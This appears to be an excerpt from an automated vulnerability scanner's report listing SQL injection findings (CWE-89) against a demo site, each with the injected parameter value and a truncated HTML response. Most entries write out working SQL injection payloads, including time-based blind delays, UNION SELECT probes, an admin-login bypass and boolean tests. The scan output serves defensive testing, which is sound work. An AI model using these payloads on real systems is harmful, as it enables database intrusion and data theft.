href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1680\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 18--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1681\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ');waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1682\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 'LIKE'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1683\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1684\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),\"'3'\"#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1685\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 16#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1686\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1' ORDER BY 1--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1687\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# 1234 ' AND 1=0 UNION ALL SELECT 'admin', '\n81dc9bdb52d04dc20036dbd8313ed055\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1688\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 7300=7300 AND 'pKlZ'='\npKlY\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1689\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 7300=7300 AND 'pKlZ'='\npKlZ\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1690\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1691\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1692\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1693\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" 